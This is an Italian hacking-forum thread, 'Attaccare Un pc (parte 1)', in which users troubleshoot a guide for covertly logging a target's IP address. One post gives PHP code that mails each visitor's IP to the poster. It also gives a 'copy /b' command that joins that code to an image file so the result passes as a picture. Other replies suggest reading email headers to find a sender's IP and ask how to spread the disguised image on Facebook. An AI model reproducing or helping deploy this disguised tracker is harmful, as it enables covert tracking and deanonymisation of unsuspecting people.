Attaccare Un pc (parte 1)

« Older   Newer »
 
  Share  
.
  1. william shady
        Like  
     
    .

    User deleted


    scusate ma non fate prima a ricavare l'ip dall'indirizzo e-mail del destinatario? :rolleyes:

    dovreste farvi mandare un messaggio da quello a cui volete prendere l'indirizzo ip (questo passaggio si può fare solo se la vostra casella e-mail è registrata su www . hotmail . it ) e fare " visualizza intestazione completa ... poi guardate bene dove c'è scritto " sender ip" e troerete l'ip di quello che volevate :rolleyes:
     
    .
  2. Dave933
        Like  
     
    .

    User deleted


    Ciao a tutti...riscontro un problema con il settimo passaggio...quello di uppare il file ip.php sul server...io sono andato su invia files e ho scelto il file ip.php e quindi l'ho caricato sul sito...ora a questo punto altervista mi dice:

    Pagina index mancante
    La cartella / non contiene una pagina index.

    Devi creare una pagina che si chiami index.html, index.htm oppure index.php (tutto minuscolo).

    Attenzione: se hai creato il sito da poco potrebbe essere necessario attendere fino a 24 ore prima che sia visibile.

    Sapete darmi una motivazione?


    X William Shady... dove si trova " visualizza intestazione completa" ?
     
    .
  3.     Like  
     
    .
    Avatar

    HackForFun --H4CK MEMBER--

    Group
    Administrator
    Posts
    1,324
    Reputation
    0
    Location
    Italia, Basilicata, MT

    Status
    Offline
    CITAZIONE (Dave933 @ 26/1/2012, 14:09) 
    Ciao a tutti...riscontro un problema con il settimo passaggio...quello di uppare il file ip.php sul server...io sono andato su invia files e ho scelto il file ip.php e quindi l'ho caricato sul sito...ora a questo punto altervista mi dice:

    Pagina index mancante
    La cartella / non contiene una pagina index.

    Devi creare una pagina che si chiami index.html, index.htm oppure index.php (tutto minuscolo).

    Attenzione: se hai creato il sito da poco potrebbe essere necessario attendere fino a 24 ore prima che sia visibile.

    'index' sarebbe la pagina Home, altrimenti conosciuta come homepage, se non c'è quella è ovvio che non riesci a visualizzare il sito, in ogni caso se hai uploadato il file ip.php in httpdocs, prova ad andare nella pagina /ip.php del tuo sito, esempio:
    www.nomesito.altervista.org/ip.php e vedi se ti visualizza la pagina.
     
    .
  4. Dave933
        Like  
     
    .

    User deleted


    ci sono andato...ecco

    deandoa.altervista.org/ip.php

    ecco un altro problema...eppure io ho copiato per bene il file seguendo tutti i passaggi
     
    .
  5.     Like  
     
    .
    Avatar

    HackForFun --H4CK MEMBER--

    Group
    Administrator
    Posts
    1,324
    Reputation
    0
    Location
    Italia, Basilicata, MT

    Status
    Offline
    CITAZIONE (Dave933 @ 26/1/2012, 17:27) 
    ci sono andato...ecco

    deandoa.altervista.org/ip.php

    ecco un altro problema...eppure io ho copiato per bene il file seguendo tutti i passaggi

    Purtroppo non so che dirti, il topic è molto vecchio e personalmente non ho mai provato.. dev'essere andato storto qualcosa nei files .txt.
     
    .
  6. Dave933
        Like  
     
    .

    User deleted


    CODICE
    <?
    $a="[email protected]";
    $oggetto="ip";
    $IP = $_SERVER[ 'REMOTE_ADDR' ];
    $messaggio=$IP;
    mail($a, $oggetto, $messaggio);
    ?>


    e lo salviamo come "ipt.php" (virgolette INCLUSE) in "cart"
    4)Andiamo su start > esegui > "cmd" > Invio
    5)Attraverso il comando "cd" ci spostiamo nella cartella "cart"
    6)A questo punto diamo il comando

    CODICE
    copy /b VOSTRA_IMMAGINE.JPG/GIF/PNG+ipt.php ip.php


    i codici erano questi...c'è qualcosa di sbagliato o da " rinnovare"?

    Edited by Dave933 - 26/1/2012, 18:10
     
    .
  7. ALêXâNÐRê
        Like  
     
    .

    User deleted


    Ciao a tutti..io ho portato a termine tutti i procedimenti con successo :pdance: ma questa guida sembra sia valida solo nei forum (ovvio xD) quindi volevo sapere: come si può fare se volessimo far vedere l'immagine tramite fb?Grazie!
     
    .
  8. virx
        Like  
     
    .

    User deleted


    Ma la seconda parte della guida?
     
    .
22 replies since 2/8/2009, 17:19   6421 views
  Share  
.